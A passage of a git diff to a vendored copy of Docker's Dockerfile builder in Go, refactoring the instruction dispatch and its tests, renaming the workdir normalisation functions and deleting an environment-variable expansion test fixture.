should be empty, got: %s", err.Error()) - } - - if b.runConfig.Volumes == nil { - t.Fatalf("Volumes should be set") - } - - if len(b.runConfig.Volumes) != 1 { - t.Fatalf("Volumes should contain only 1 element. Got %s", b.runConfig.Volumes) - } - - if _, ok := b.runConfig.Volumes[exposedVolume]; !ok { - t.Fatalf("Volume %s should be present. 
Got %s", exposedVolume, b.runConfig.Volumes) + cmd := &instructions.VolumeCommand{ + Volumes: []string{exposedVolume}, } + err := dispatch(sb, cmd) + assert.NilError(t, err) + assert.Assert(t, sb.state.runConfig.Volumes != nil) + assert.Check(t, is.Len(sb.state.runConfig.Volumes, 1)) + assert.Check(t, is.Contains(sb.state.runConfig.Volumes, exposedVolume)) } func TestStopSignal(t *testing.T) { - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} - - signal := "SIGKILL" - - if err := stopSignal(b, []string{signal}, nil, ""); err != nil { - t.Fatalf("Error should be empty, got: %s", err.Error()) + if runtime.GOOS == "windows" { + t.Skip("Windows does not support stopsignal") + return } + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) + sb.state.baseImage = &mockImage{} + signal := "SIGKILL" - if b.runConfig.StopSignal != signal { - t.Fatalf("StopSignal should be set to %s, got %s", signal, b.runConfig.StopSignal) + cmd := &instructions.StopSignalCommand{ + Signal: signal, } + err := dispatch(sb, cmd) + assert.NilError(t, err) + assert.Check(t, is.Equal(signal, sb.state.runConfig.StopSignal)) } func TestArg(t *testing.T) { - buildOptions := &types.ImageBuildOptions{BuildArgs: make(map[string]*string)} - - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true, allowedBuildArgs: make(map[string]bool), options: buildOptions} + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) argName := "foo" argVal := "bar" - argDef := fmt.Sprintf("%s=%s", argName, argVal) + cmd := &instructions.ArgCommand{Key: argName, Value: &argVal} + err := dispatch(sb, cmd) + assert.NilError(t, err) - if err := arg(b, []string{argDef}, nil, ""); err != nil { - t.Fatalf("Error should be empty, got: %s", err.Error()) - } - - allowed, ok := 
b.allowedBuildArgs[argName] - - if !ok { - t.Fatalf("%s argument should be allowed as a build arg", argName) - } - - if !allowed { - t.Fatalf("%s argument was present in map but disallowed as a build arg", argName) - } - - val, ok := b.options.BuildArgs[argName] - - if !ok { - t.Fatalf("%s argument should be a build arg", argName) - } - - if *val != "bar" { - t.Fatalf("%s argument should have default value 'bar', got %s", argName, val) - } + expected := map[string]string{argName: argVal} + assert.Check(t, is.DeepEqual(expected, sb.state.buildArgs.GetAllAllowed())) } func TestShell(t *testing.T) { - b := &Builder{flags: &BFlags{}, runConfig: &container.Config{}, disableCommit: true} + b := newBuilderWithMockBackend() + sb := newDispatchRequest(b, '`', nil, NewBuildArgs(make(map[string]*string)), newStagesBuildResults()) shellCmd := "powershell" + cmd := &instructions.ShellCommand{Shell: strslice.StrSlice{shellCmd}} - attrs := make(map[string]bool) - attrs["json"] = true + err := dispatch(sb, cmd) + assert.NilError(t, err) - if err := shell(b, []string{shellCmd}, attrs, ""); err != nil { - t.Fatalf("Error should be empty, got: %s", err.Error()) - } + expectedShell := strslice.StrSlice([]string{shellCmd}) + assert.Check(t, is.DeepEqual(expectedShell, sb.state.runConfig.Shell)) +} - if b.runConfig.Shell == nil { - t.Fatalf("Shell should be set") - } +func TestPrependEnvOnCmd(t *testing.T) { + buildArgs := NewBuildArgs(nil) + buildArgs.AddArg("NO_PROXY", nil) - expectedShell := strslice.StrSlice([]string{shellCmd}) + args := []string{"sorted=nope", "args=not", "http_proxy=foo", "NO_PROXY=YA"} + cmd := []string{"foo", "bar"} + cmdWithEnv := prependEnvOnCmd(buildArgs, args, cmd) + expected := strslice.StrSlice([]string{ + "|3", "NO_PROXY=YA", "args=not", "sorted=nope", "foo", "bar"}) + assert.Check(t, is.DeepEqual(expected, cmdWithEnv)) +} - if !compareStrSlice(expectedShell, b.runConfig.Shell) { - t.Fatalf("Shell should be set to %s, got %s", expectedShell, 
b.runConfig.Shell) - } +func TestRunWithBuildArgs(t *testing.T) { + b := newBuilderWithMockBackend() + args := NewBuildArgs(make(map[string]*string)) + args.argsFromOptions["HTTP_PROXY"] = strPtr("FOO") + b.disableCommit = false + sb := newDispatchRequest(b, '`', nil, args, newStagesBuildResults()) + + runConfig := &container.Config{} + origCmd := strslice.StrSlice([]string{"cmd", "in", "from", "image"}) + cmdWithShell := strslice.StrSlice(append(getShell(runConfig, runtime.GOOS), "echo foo")) + envVars := []string{"|1", "one=two"} + cachedCmd := strslice.StrSlice(append(envVars, cmdWithShell...)) + + imageCache := &mockImageCache{ + getCacheFunc: func(parentID string, cfg *container.Config) (string, error) { + // Check the runConfig.Cmd sent to probeCache() + assert.Check(t, is.DeepEqual(cachedCmd, cfg.Cmd)) + assert.Check(t, is.DeepEqual(strslice.StrSlice(nil), cfg.Entrypoint)) + return "", nil + }, + } + + mockBackend := b.docker.(*MockBackend) + mockBackend.makeImageCacheFunc = func(_ []string) builder.ImageCache { + return imageCache + } + b.imageProber = newImageProber(mockBackend, nil, false) + mockBackend.getImageFunc = func(_ string) (builder.Image, builder.ROLayer, error) { + return &mockImage{ + id: "abcdef", + config: &container.Config{Cmd: origCmd}, + }, nil, nil + } + mockBackend.containerCreateFunc = func(config types.ContainerCreateConfig) (container.ContainerCreateCreatedBody, error) { + // Check the runConfig.Cmd sent to create() + assert.Check(t, is.DeepEqual(cmdWithShell, config.Config.Cmd)) + assert.Check(t, is.Contains(config.Config.Env, "one=two")) + assert.Check(t, is.DeepEqual(strslice.StrSlice{""}, config.Config.Entrypoint)) + return container.ContainerCreateCreatedBody{ID: "12345"}, nil + } + mockBackend.commitFunc = func(cfg backend.CommitConfig) (image.ID, error) { + // Check the runConfig.Cmd sent to commit() + assert.Check(t, is.DeepEqual(origCmd, cfg.Config.Cmd)) + assert.Check(t, is.DeepEqual(cachedCmd, cfg.ContainerConfig.Cmd)) + 
assert.Check(t, is.DeepEqual(strslice.StrSlice(nil), cfg.Config.Entrypoint)) + return "", nil + } + from := &instructions.Stage{BaseName: "abcdef"} + err := initializeStage(sb, from) + assert.NilError(t, err) + sb.state.buildArgs.AddArg("one", strPtr("two")) + run := &instructions.RunCommand{ + ShellDependantCmdLine: instructions.ShellDependantCmdLine{ + CmdLine: strslice.StrSlice{"echo foo"}, + PrependShell: true, + }, + } + assert.NilError(t, dispatch(sb, run)) + + // Check that runConfig.Cmd has not been modified by run + assert.Check(t, is.DeepEqual(origCmd, sb.state.runConfig.Cmd)) } diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix.go index 8b0dfc3911..b3ba380323 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix.go @@ -1,18 +1,18 @@ // +build !windows -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" import ( - "fmt" + "errors" "os" "path/filepath" ) -// normaliseWorkdir normalises a user requested working directory in a -// platform sematically consistent way. -func normaliseWorkdir(current string, requested string) (string, error) { +// normalizeWorkdir normalizes a user requested working directory in a +// platform semantically consistent way. 
+func normalizeWorkdir(_ string, current string, requested string) (string, error) { if requested == "" { - return "", fmt.Errorf("cannot normalise nothing") + return "", errors.New("cannot normalize nothing") } current = filepath.FromSlash(current) requested = filepath.FromSlash(requested) @@ -21,7 +21,3 @@ func normaliseWorkdir(current string, requested string) (string, error) { } return requested, nil } - -func errNotJSON(command, _ string) error { - return fmt.Errorf("%s requires the arguments to be in JSON form", command) -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix_test.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix_test.go index 4aae6b460e..c2aebfbb27 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix_test.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_unix_test.go @@ -1,14 +1,15 @@ // +build !windows -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" import ( + "runtime" "testing" ) -func TestNormaliseWorkdir(t *testing.T) { +func TestNormalizeWorkdir(t *testing.T) { testCases := []struct{ current, requested, expected, expectedError string }{ - {``, ``, ``, `cannot normalise nothing`}, + {``, ``, ``, `cannot normalize nothing`}, {``, `foo`, `/foo`, ``}, {``, `/foo`, `/foo`, ``}, {`/foo`, `bar`, `/foo/bar`, ``}, @@ -16,18 +17,18 @@ func TestNormaliseWorkdir(t *testing.T) { } for _, test := range testCases { - normalised, err := normaliseWorkdir(test.current, test.requested) + normalized, err := normalizeWorkdir(runtime.GOOS, test.current, test.requested) if test.expectedError != "" && err == nil { - t.Fatalf("NormaliseWorkdir should return an error %s, got nil", test.expectedError) + t.Fatalf("NormalizeWorkdir should return an error %s, got nil", test.expectedError) } if test.expectedError != "" && err.Error() != test.expectedError { - t.Fatalf("NormaliseWorkdir returned wrong error. 
Expected %s, got %s", test.expectedError, err.Error()) + t.Fatalf("NormalizeWorkdir returned wrong error. Expected %s, got %s", test.expectedError, err.Error()) } - if normalised != test.expected { - t.Fatalf("NormaliseWorkdir error. Expected %s for current %s and requested %s, got %s", test.expected, test.current, test.requested, normalised) + if normalized != test.expected { + t.Fatalf("NormalizeWorkdir error. Expected %s for current %s and requested %s, got %s", test.expected, test.current, test.requested, normalized) } } } diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows.go index e890c3ae18..7824d1169b 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows.go @@ -1,8 +1,10 @@ -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" import ( + "errors" "fmt" "os" + "path" "path/filepath" "regexp" "strings" @@ -12,11 +14,37 @@ import ( var pattern = regexp.MustCompile(`^[a-zA-Z]:\.$`) -// normaliseWorkdir normalises a user requested working directory in a -// platform sematically consistent way. -func normaliseWorkdir(current string, requested string) (string, error) { +// normalizeWorkdir normalizes a user requested working directory in a +// platform semantically consistent way. +func normalizeWorkdir(platform string, current string, requested string) (string, error) { + if platform == "" { + platform = "windows" + } + if platform == "windows" { + return normalizeWorkdirWindows(current, requested) + } + return normalizeWorkdirUnix(current, requested) +} + +// normalizeWorkdirUnix normalizes a user requested working directory in a +// platform semantically consistent way. 
+func normalizeWorkdirUnix(current string, requested string) (string, error) { + if requested == "" { + return "", errors.New("cannot normalize nothing") + } + current = strings.Replace(current, string(os.PathSeparator), "/", -1) + requested = strings.Replace(requested, string(os.PathSeparator), "/", -1) + if !path.IsAbs(requested) { + return path.Join(`/`, current, requested), nil + } + return requested, nil +} + +// normalizeWorkdirWindows normalizes a user requested working directory in a +// platform semantically consistent way. +func normalizeWorkdirWindows(current string, requested string) (string, error) { if requested == "" { - return "", fmt.Errorf("cannot normalise nothing") + return "", errors.New("cannot normalize nothing") } // `filepath.Clean` will replace "" with "." so skip in that case @@ -65,22 +93,3 @@ func normaliseWorkdir(current string, requested string) (string, error) { // Upper-case drive letter return (strings.ToUpper(string(requested[0])) + requested[1:]), nil } - -func errNotJSON(command, original string) error { - // For Windows users, give a hint if it looks like it might contain - // a path which hasn't been escaped such as ["c:\windows\system32\prog.exe", "-param"], - // as JSON must be escaped. Unfortunate... - // - // Specifically looking for quote-driveletter-colon-backslash, there's no - // double backslash and a [] pair. No, this is not perfect, but it doesn't - // have to be. It's simply a hint to make life a little easier. - extra := "" - original = filepath.FromSlash(strings.ToLower(strings.Replace(strings.ToLower(original), strings.ToLower(command)+" ", "", -1))) - if len(regexp.MustCompile(`"[a-z]:\\.*`).FindStringSubmatch(original)) > 0 && - !strings.Contains(original, `\\`) && - strings.Contains(original, "[") && - strings.Contains(original, "]") { - extra = fmt.Sprintf(`. It looks like '%s' includes a file path without an escaped back-slash. 
JSON requires back-slashes to be escaped such as ["c:\\path\\to\\file.exe", "/parameter"]`, original) - } - return fmt.Errorf("%s requires the arguments to be in JSON form%s", command, extra) -} diff --git a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows_test.go b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows_test.go index 3319c06582..ae72092c4f 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows_test.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/dispatchers_windows_test.go @@ -1,40 +1,46 @@ // +build windows -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" import "testing" -func TestNormaliseWorkdir(t *testing.T) { - tests := []struct{ current, requested, expected, etext string }{ - {``, ``, ``, `cannot normalise nothing`}, - {``, `C:`, ``, `C:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`}, - {``, `C:.`, ``, `C:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`}, - {`c:`, `\a`, ``, `c:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`}, - {`c:.`, `\a`, ``, `c:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`}, - {``, `a`, `C:\a`, ``}, - {``, `c:\foo`, `C:\foo`, ``}, - {``, `c:\\foo`, `C:\foo`, ``}, - {``, `\foo`, `C:\foo`, ``}, - {``, `\\foo`, `C:\foo`, ``}, - {``, `/foo`, `C:\foo`, ``}, - {``, `C:/foo`, `C:\foo`, ``}, - {`C:\foo`, `bar`, `C:\foo\bar`, ``}, - {`C:\foo`, `/bar`, `C:\bar`, ``}, - {`C:\foo`, `\bar`, `C:\bar`, ``}, +func TestNormalizeWorkdir(t *testing.T) { + tests := []struct{ platform, current, requested, expected, etext string }{ + {"windows", ``, ``, ``, `cannot normalize nothing`}, + {"windows", ``, `C:`, ``, `C:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`}, + {"windows", ``, `C:.`, ``, `C:. is not a directory. 
If you are specifying a drive letter, please add a trailing '\'`}, + {"windows", `c:`, `\a`, ``, `c:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`}, + {"windows", `c:.`, `\a`, ``, `c:. is not a directory. If you are specifying a drive letter, please add a trailing '\'`}, + {"windows", ``, `a`, `C:\a`, ``}, + {"windows", ``, `c:\foo`, `C:\foo`, ``}, + {"windows", ``, `c:\\foo`, `C:\foo`, ``}, + {"windows", ``, `\foo`, `C:\foo`, ``}, + {"windows", ``, `\\foo`, `C:\foo`, ``}, + {"windows", ``, `/foo`, `C:\foo`, ``}, + {"windows", ``, `C:/foo`, `C:\foo`, ``}, + {"windows", `C:\foo`, `bar`, `C:\foo\bar`, ``}, + {"windows", `C:\foo`, `/bar`, `C:\bar`, ``}, + {"windows", `C:\foo`, `\bar`, `C:\bar`, ``}, + {"linux", ``, ``, ``, `cannot normalize nothing`}, + {"linux", ``, `foo`, `/foo`, ``}, + {"linux", ``, `/foo`, `/foo`, ``}, + {"linux", `/foo`, `bar`, `/foo/bar`, ``}, + {"linux", `/foo`, `/bar`, `/bar`, ``}, + {"linux", `\a`, `b\c`, `/a/b/c`, ``}, } for _, i := range tests { - r, e := normaliseWorkdir(i.current, i.requested) + r, e := normalizeWorkdir(i.platform, i.current, i.requested) if i.etext != "" && e == nil { - t.Fatalf("TestNormaliseWorkingDir Expected error %s for '%s' '%s', got no error", i.etext, i.current, i.requested) + t.Fatalf("TestNormalizeWorkingDir Expected error %s for '%s' '%s', got no error", i.etext, i.current, i.requested) } if i.etext != "" && e.Error() != i.etext { - t.Fatalf("TestNormaliseWorkingDir Expected error %s for '%s' '%s', got %s", i.etext, i.current, i.requested, e.Error()) + t.Fatalf("TestNormalizeWorkingDir Expected error %s for '%s' '%s', got %s", i.etext, i.current, i.requested, e.Error()) } if r != i.expected { - t.Fatalf("TestNormaliseWorkingDir Expected '%s' for '%s' '%s', got '%s'", i.expected, i.current, i.requested, r) + t.Fatalf("TestNormalizeWorkingDir Expected '%s' for '%s' '%s', got '%s'", i.expected, i.current, i.requested, r) } } } diff --git 
a/vendor/github.com/docker/docker/builder/dockerfile/envVarTest b/vendor/github.com/docker/docker/builder/dockerfile/envVarTest deleted file mode 100644 index 067dca9a54..0000000000 --- a/vendor/github.com/docker/docker/builder/dockerfile/envVarTest +++ /dev/null @@ -1,116 +0,0 @@ -A|hello | hello -A|he'll'o | hello -A|he'llo | hello -A|he\'llo | he'llo -A|he\\'llo | he\llo -A|abc\tdef | abctdef -A|"abc\tdef" | abc\tdef -A|'abc\tdef' | abc\tdef -A|hello\ | hello -A|hello\\ | hello\ -A|"hello | hello -A|"hello\" | hello" -A|"hel'lo" | hel'lo -A|'hello | hello -A|'hello\' | hello\ -A|"''" | '' -A|$. | $. -A|$1 | -A|he$1x | hex -A|he$.x | he$.x -# Next one is different on Windows as $pwd==$PWD -U|he$pwd. | he. -W|he$pwd. | he/home. -A|he$PWD | he/home -A|he\$PWD | he$PWD -A|he\\$PWD | he\/home -A|he\${} | he${} -A|he\${}xx | he${}xx -A|he${} | he -A|he${}xx | hexx -A|he${hi} | he -A|he${hi}xx | hexx -A|he${PWD} | he/home -A|he${.} | error -A|he${XXX:-000}xx | he000xx -A|he${PWD:-000}xx | he/homexx -A|he${XXX:-$PWD}xx | he/homexx -A|he${XXX:-${PWD:-yyy}}xx | he/homexx -A|he${XXX:-${YYY:-yyy}}xx | heyyyxx -A|he${XXX:YYY} | error -A|he${XXX:+${PWD}}xx | hexx -A|he${PWD:+${XXX}}xx | hexx -A|he${PWD:+${SHELL}}xx | hebashxx -A|he${XXX:+000}xx | hexx -A|he${PWD:+000}xx | he000xx -A|'he${XX}' | he${XX} -A|"he${PWD}" | he/home -A|"he'$PWD'" | he'/home' -A|"$PWD" | /home -A|'$PWD' | $PWD -A|'\$PWD' | \$PWD -A|'"hello"' | "hello" -A|he\$PWD | he$PWD -A|"he\$PWD" | he$PWD -A|'he\$PWD' | he\$PWD -A|he${PWD | error -A|he${PWD:=000}xx | error -A|he${PWD:+${PWD}:}xx | he/home:xx -A|he${XXX:-\$PWD:}xx | he$PWD:xx -A|he${XXX:-\${PWD}z}xx | he${PWDz}xx -A|안녕하세요 | 안녕하세요 -A|안'녕'하세요 | 안녕하세요 -A|안'녕하세요 | 안녕하세요 -A|안녕\'하세요 | 안녕'하세요 -A|안\\'녕하세요 | 안\녕하세요 -A|안녕\t하세요 | 안녕t하세요 -A|"안녕\t하세요" | 안녕\t하세요 -A|'안녕\t하세요 | 안녕\t하세요 -A|안녕하세요\ | 안녕하세요 -A|안녕하세요\\ | 안녕하세요\ -A|"안녕하세요 | 안녕하세요 -A|"안녕하세요\" | 안녕하세요" -A|"안녕'하세요" | 안녕'하세요 -A|'안녕하세요 | 안녕하세요 -A|'안녕하세요\' | 안녕하세요\ -A|안녕$1x | 안녕x -A|안녕$.x | 안녕$.x -# Next one 
is different on Windows as $pwd==$PWD -U|안녕$pwd. | 안녕. -W|안녕$pwd. | 안녕/home. -A|안녕$PWD | 안녕/home -A|안녕\$PWD | 안녕$PWD -A|안녕\\$PWD | 안녕\/home -A|안녕\${} | 안녕${} -A|안녕\${}xx | 안녕${}xx -A|안녕${} | 안녕 -A|안녕${}xx | 안녕xx -A|안녕${hi} | 안녕 -A|안녕${hi}xx | 안녕xx -A|안녕${PWD} | 안녕/home -A|안녕${.} | error -A|안녕${XXX:-000}xx | 안녕000xx -A|안녕${PWD:-000}xx | 안녕/homexx -A|안녕${XXX:-$PWD}xx | 안녕/homexx -A|안녕${XXX:-${PWD:-yyy}}xx | 안녕/homexx -A|안녕${XXX:-${YYY:-yyy}}xx | 안녕yyyxx -A|안녕${XXX:YYY} | error -A|안녕${XXX:+${PWD}}xx | 안녕xx -A|안녕${PWD:+${XXX}}xx | 안녕xx -A|안녕${PWD:+${SHELL}}xx | 안녕bashxx -A|안녕${XXX:+000}xx | 안녕xx -A|안녕${PWD:+000}xx | 안녕000xx -A|'안녕${XX}' | 안녕${XX} -A|"안녕${PWD}" | 안녕/home -A|"안녕'$PWD'" | 안녕'/home' -A|'"안녕"' | "안녕" -A|안녕\$PWD | 안녕$PWD -A|"안녕\$PWD" | 안녕$PWD -A|'안녕\$PWD' | 안녕\$PWD -A|안녕${PWD | error -A|안녕${PWD:=000}xx | error -A|안녕${PWD:+${PWD}:}xx | 안녕/home:xx -A|안녕${XXX:-\$PWD:}xx | 안녕$PWD:xx -A|안녕${XXX:-\${PWD}z}xx | 안녕${PWDz}xx -A|$KOREAN | 한국어 -A|안녕$KOREAN | 안녕한국어 diff --git a/vendor/github.com/docker/docker/builder/dockerfile/evaluator.go b/vendor/github.com/docker/docker/builder/dockerfile/evaluator.go index f5997c91a6..02e1477528 100644 --- a/vendor/github.com/docker/docker/builder/dockerfile/evaluator.go +++ b/vendor/github.com/docker/docker/builder/dockerfile/evaluator.go @@ -2,7 +2,7 @@ // // It incorporates a dispatch table based on the parser.Node values (see the // parser package for more information) that are yielded from the parser itself. -// Calling NewBuilder with the BuildOpts struct can be used to customize the +// Calling newBuilder with the BuildOpts struct can be used to customize the // experience for execution purposes only. Parsing is controlled in the parser // package, and this division of responsibility should be respected. // @@ -17,228 +17,234 @@ // before and after each step, such as creating an image ID and removing temporary // containers and images. 
Note that ONBUILD creates a kinda-sorta "sub run" which // includes its own set of steps (usually only one of them). -package dockerfile +package dockerfile // import "github.com/docker/docker/builder/dockerfile" import ( - "fmt" + "reflect" + "runtime" + "strconv" "strings" - "github.com/docker/docker/builder/dockerfile/command" - "github.com/docker/docker/builder/dockerfile/parser" + "github.com/docker/docker/api/types/container" + "github.com/docker/docker/builder" + "github.com/docker/docker/errdefs" + "github.com/docker/docker/pkg/system" + "github.com/docker/docker/runconfig/opts" + "github.com/moby/buildkit/frontend/dockerfile/instructions" + "github.com/moby/buildkit/frontend/dockerfile/shell" + "github.com/pkg/errors" ) -// Environment variable interpolation will happen on these statements only. -var replaceEnvAllowed = map[string]bool{ - command.Env: true, - command.Label: true, - command.Add: true, - command.Copy: true, - command.Workdir: true, - command.Expose: true, - command.Volume: true, - command.User: true, - command.StopSignal: true, - command.Arg: true, -} - -// Certain commands are allowed to have their args split into more -// words after env var replacements. Meaning: -// ENV foo="123 456" -// EXPOSE $foo -// should result in the same thing as: -// EXPOSE 123 456 -// and not treat "123 456" as a single word. -// Note that: EXPOSE "$foo" and EXPOSE $foo are not the same thing. -// Quotes will cause it to still be treated as single word. 
-var allowWordExpansion = map[string]bool{ - command.Expose: true, -} - -var evaluateTable map[string]func(*Builder, []string, map[string]bool, string) error - -func init() { - evaluateTable = map[string]func(*Builder, []string, map[string]bool, string) error{ - command.Add: add, - command.Arg: arg, - command.Cmd: cmd, - command.Copy: dispatchCopy, // copy() is a go builtin - command.Entrypoint: entrypoint, - command.Env: env, - command.Expose: expose, - command.From: from, - command.Healthcheck: healthcheck, - command.Label: label, - command.Maintainer: maintainer, - command.Onbuild: onbuild, - command.Run: run, - command.Shell: shell, - command.StopSignal: stopSignal, - command.User: user, - command.Volume: volume, - command.Workdir: workdir, - } -} - -// This method is the entrypoint to all statement handling routines. -// -// Almost all nodes will have this structure: -// Child[Node, Node, Node] where Child is from parser.Node.Children and each -// node comes from parser.Node.Next. This forms a "line" with a statement and -// arguments and we process them in this normalized form by hitting -// evaluateTable with the leaf nodes of the command and the Builder object. -// -// ONBUILD is a special case; in this case the parser will emit: -// Child[Node, Child[Node, Node...]] where the first node is the literal -// "onbuild" and the child entrypoint is the command of the ONBUILD statement, -// such as `RUN` in ONBUILD RUN foo. There is special case logic in here to -// deal with that, at least until it becomes more of a general concern with new -// features. -func (b *Builder) dispatch(stepN int, stepTotal int, ast *parser.Node) error { - cmd := ast.Value - upperCasedCmd := strings.ToUpper(cmd) - - // To ensure the user is given a decent error message if the platform - // on which the daemon is running does not support a builder command. 
- if err := platformSupports(strings.ToLower(cmd)); err != nil { - return err - } - - attrs := ast.Attributes - original := ast.Original - flags := ast.Flags - strList := []string{} - msg := fmt.Sprintf("Step %d/%d : %s", stepN+1, stepTotal, upperCasedCmd) - - if len(ast.Flags) > 0 { - msg += " " + strings.Join(ast.Flags, " ") - } - - if cmd == "onbuild" { - if ast.Next == nil { - return fmt.Errorf("ONBUILD requires at least one argument") +func dispatch(d dispatchRequest, cmd instructions.Command) (err error) { + if c, ok := cmd.(instructions.PlatformSpecific); ok { + err := c.CheckPlatform(d.state.operatingSystem) + if err != nil { + return errdefs.InvalidParameter(err) } - ast = ast.Next.Children[0] - strList = append(strList, ast.Value) - msg += " " + ast.Value - - if len(ast.Flags) > 0 { - msg += " " + strings.Join(ast.Flags, " ") + } + runConfigEnv := d.state.runConfig.Env + envs := append(runConfigEnv, d.state.buildArgs.FilterAllowed(runConfigEnv)...) + + if ex, ok := cmd.(instructions.SupportsSingleWordExpansion); ok { + err := ex.Expand(func(word string) (string, error) { + return d.shlex.ProcessWord(word, envs) + }) + if err != nil { + return errdefs.InvalidParameter(err) } - } - // count the number of nodes that we are going to traverse first - // so we can pre-create the argument and message array. This speeds up the - // allocation of those list a lot when they have a lot of arguments - cursor := ast - var n int - for cursor.Next != nil { - cursor = cursor.Next - n++ - } - msgList := make([]string, n) - - var i int - // Append the build-time args to config-environment. - // This allows builder config to override the variables, making the behavior similar to - // a shell script i.e. `ENV foo bar` overrides value of `foo` passed in build - // context. But `ENV foo $foo` will use the value from build context if one - // isn't already been defined by a previous ENV primitive. 
- // Note, we get this behavior because we know that ProcessWord() will - // stop on the first occurrence of a variable name and not notice - // a subsequent one. So, putting the buildArgs list after the Config.Env - // list, in 'envs', is safe. - envs := b.runConfig.Env - for key, val := range b.options.BuildArgs { - if !b.isBuildArgAllowed(key) { - // skip build-args that are not in allowed list, meaning they have - // not been defined by an "ARG" Dockerfile command yet. - // This is an error condition but only if there is no "ARG" in the entire - // Dockerfile, so we'll generate any necessary errors after we parsed - // the entire file (see 'leftoverArgs' processing in evaluator.go ) - continue + defer func() { + if d.builder.options.ForceRemove { + d.builder.containerManager.RemoveAll(d.builder.Stdout) + return } - envs = append(envs, fmt.Sprintf("%s=%s", key, *val)) - } - for ast.Next != nil { - ast = ast.Next - var str string - str = ast.Value - if replaceEnvAllowed[cmd] { - var err error - var words []string - - if allowWordExpansion[cmd] { - words, err = ProcessWords(str, envs, b.directive.EscapeToken) - if err != nil { - return err - } - strList = append(strList, words...) 
- } else { - str, err = ProcessWord(str, envs, b.directive.EscapeToken) - if err != nil { - return err - } - strList = append(strList, str) - } - } else { - strList = append(strList, str) + if d.builder.options.Remove && err == nil { + d.builder.containerManager.RemoveAll(d.builder.Stdout) + return } - msgList[i] = ast.Value - i++ + }() + switch c := cmd.(type) { + case *instructions.EnvCommand: + return dispatchEnv(d, c) + case *instructions.MaintainerCommand: + return dispatchMaintainer(d, c) + case *instructions.LabelCommand: + return dispatchLabel(d, c) + case *instructions.AddCommand: + return dispatchAdd(d, c) + case *instructions.CopyCommand: + return dispatchCopy(d, c) + case *instructions.OnbuildCommand: + return dispatchOnbuild(d, c) + case *instructions.WorkdirCommand: + return dispatchWorkdir(d, c) + case *instructions.RunCommand: + return dispatchRun(d, c) + case *instructions.CmdCommand: + return dispatchCmd(d, c) + case *instructions.HealthCheckCommand: + return dispatchHealthcheck(d, c) + case *instructions.EntrypointCommand: + return dispatchEntrypoint(d, c) + case *instructions.ExposeCommand: + return dispatchExpose(d, c, envs) + case *instructions.UserCommand: + return dispatchUser(d, c) + case *instructions.VolumeCommand: + return dispatchVolume(d, c) + case *instructions.StopSignalCommand: + return dispatchStopSignal(d, c) + case *instructions.ArgCommand: + return dispatchArg(d, c) + case *instructions.ShellCommand: + return dispatchShell(d, c) } + return errors.Errorf("unsupported command type: %v", reflect.TypeOf(cmd)) +} - msg += " " + strings.Join(msgList, " ") - fmt.Fprintln(b.Stdout, msg) +// dispatchState is a data object which is modified by dispatchers +type dispatchState struct { + runConfig *container.Config + maintainer string + cmdSet bool + imageID string + baseImage builder.Image + stageName string + buildArgs *BuildArgs + operatingSystem string +} - // XXX yes, we skip any cmds that are not valid; the parser should have - // 
picked these out already. - if f, ok := evaluateTable[cmd]; ok { - b.flags = NewBFlags() - b.flags.Args = flags - return f(b, strList, attrs, original) +func newDispatchState(baseArgs *BuildArgs) *dispatchState { + args := baseArgs.Clone() + args.ResetAllowed() + return &dispatchState{runConfig: &container.Config{}, buildArgs: args} +} + +type stagesBuildResults struct { + flat []*container.Config + indexed map[string]*container.Config +} + +func newStagesBuildResults() *stagesBuildResults { + return &stagesBuildResults{ + indexed: make(map[string]*container.Config), } +} - return fmt.Errorf("Unknown instruction: %s", upperCasedCmd) +func (r *stagesBuildResults) getByName(name string) (*container.Config, bool) { + c, ok := r.indexed[strings.ToLower(name)] + return c, ok } -// checkDispatch does a simple check for syntax errors of the Dockerfile. -// Because some of the instructions can only be validated through runtime, -// arg, env, etc., this syntax check will not be complete and could not replace -// the runtime check. Instead, this function is only a helper that allows -// user to find out the obvious error in Dockerfile earlier on. -// onbuild bool: indicate if instruction XXX is part of `ONBUILD XXX` trigger -func (b *Builder) checkDispatch(ast *parser.Node, onbuild bool) error { - cmd := ast.Value - upperCasedCmd := strings.ToUpper(cmd) +func (r *stagesBuildResults) validateIndex(i int) error { + if i == len(r.flat) { + return errors.New("refers to current build stage") + } + if i < 0 || i > len(r.flat) { + return errors.New("index out of bounds") + } + return nil +} - // To ensure the user is given a decent error message if the platform - // on which the daemon is running does not support a builder command. 
